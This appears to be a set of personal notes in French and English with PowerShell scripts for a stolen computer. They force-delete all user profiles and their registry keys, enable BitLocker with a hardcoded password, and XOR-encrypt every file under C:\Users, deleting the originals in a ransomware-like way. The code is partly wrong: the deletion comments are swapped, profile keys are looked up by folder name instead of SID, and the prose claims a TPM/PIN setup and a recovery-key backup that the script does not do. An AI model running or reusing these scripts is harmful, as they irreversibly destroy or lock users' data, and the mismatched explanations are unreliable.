Suppression des données utilisateurs
$users = Get-ChildItem "C:\Users\" -Exclude "Public"
ForEach ($user in $users) {
$sid = $user.Name
$path = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\" + $sid
Remove-Item -Path $path -Recurse -Force #delete files & folders
Remove-Item -Path $user.FullName -Recurse -Force #delete register
}
Activation de BitLocker
TPM required.
$driveLetter = "C"
$bitlockerPassword = "VotreMotDePasse"
$securePassword = ConvertTo-SecureString $bitlockerPassword -AsPlainText -Force
Enable-BitLocker -MountPoint $driveLetter -EncryptionMethod Aes256 -PasswordProtector -Password $securePassword
This script will enable BitLocker on the system drive (assuming it’s eligible for encryption), using a specified password and a TPM and PIN protector. It will also back up the BitLocker recovery key to a file on the system drive.
Note that this script assumes that you have administrative access to the stolen computer and that you have the necessary permissions to enable BitLocker. Additionally, enabling BitLocker remotely may require additional network or system configuration, depending on your specific environment. Be sure to consult your organization’s security policies and procedures before attempting to enable BitLocker remotely.
Chiffremment manuel des données utilisateurs
XOR
XOR Encryptor Powershell
$folderPath = "C:\Users"
$password = "VotreMotDePasse"
$hashedPassword = [System.Security.Cryptography.SHA256]::Create().ComputeHash([System.Text.Encoding]::UTF8.GetBytes($password))
$fileList = Get-ChildItem -Path $folderPath -Recurse
function Encrypt-File {
param(
[string]$filePath,
[byte[]]$key
)
Write-Host "$($filePath)"
$fileData = [System.IO.File]::ReadAllBytes($filePath)
for ($i = 0; $i -lt $fileData.Length; $i++) {
$fileData[$i] = $fileData[$i] -bxor $key[$i % $key.Length]
}
[System.IO.File]::WriteAllBytes("$filePath.enc", $fileData)
}
foreach ($file in $fileList) {
if ($file -is [System.IO.FileInfo]) {
Encrypt-File -filePath $file.FullName -key $hashedPassword
Remove-Item -Path $file.FullName
}
}
Write-Host "Chiffrement et suppression des anciens fichiers terminés."
XOR Decryptor Powershell
$folderPath = "C:\Users"
$password = "VotreMotDePasse"
$hashedPassword = [System.Security.Cryptography.SHA256]::Create().ComputeHash([System.Text.Encoding]::UTF8.GetBytes($password))
$fileList = Get-ChildItem -Path $folderPath -Filter "*.enc" -Recurse
function Decrypt-File {
param(
[string]$filePath,
[byte[]]$key
)
Write-Host "Déchiffrement du fichier : $($filePath)"
$fileData = [System.IO.File]::ReadAllBytes($filePath)
for ($i = 0; $i -lt $fileData.Length; $i++) {
$fileData[$i] = $fileData[$i] -bxor $key[$i % $key.Length]
}
[System.IO.File]::WriteAllBytes($filePath.Replace(".enc", ""), $fileData)
}
foreach ($file in $fileList) {
if ($file -is [System.IO.FileInfo]) {
Decrypt-File -filePath $file.FullName -key $hashedPassword
Remove-Item -Path $file.FullName
}
}
Write-Host "Déchiffrement terminé."